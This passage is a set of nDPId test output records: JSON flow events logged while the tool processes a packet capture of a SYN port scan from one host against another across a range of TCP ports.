+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 